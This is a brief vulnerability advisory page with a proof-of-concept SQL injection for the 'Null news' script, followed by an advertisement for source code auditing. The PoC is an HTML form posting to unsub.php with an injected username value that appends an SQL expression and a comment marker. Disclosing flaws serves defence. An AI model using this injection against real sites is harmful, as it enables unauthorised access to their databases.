PoC/Exploit for SQL Injection Vulnerability in Null news

Published Proof of Concept code - SQL Injection Vulnerability in Null news.

Description
Available
Solution
Not available - check vendor's website

SQL Injection Example:

<form action=http://[host]/unsub.php method=post>
<input name=email value=aaa@aaa.com>
<input name=username value="zzz' AND [SQL expression]/*">
<input name=password value=aaa>
<input type=submit>
</form>

Order Source Code Analysis made by eVuln team

Protect against hacker attacks by source code testing of your site or web application made by Aliaksandr Hartsuyeu.The order will be done by experts in website security.

Advisories by vuln type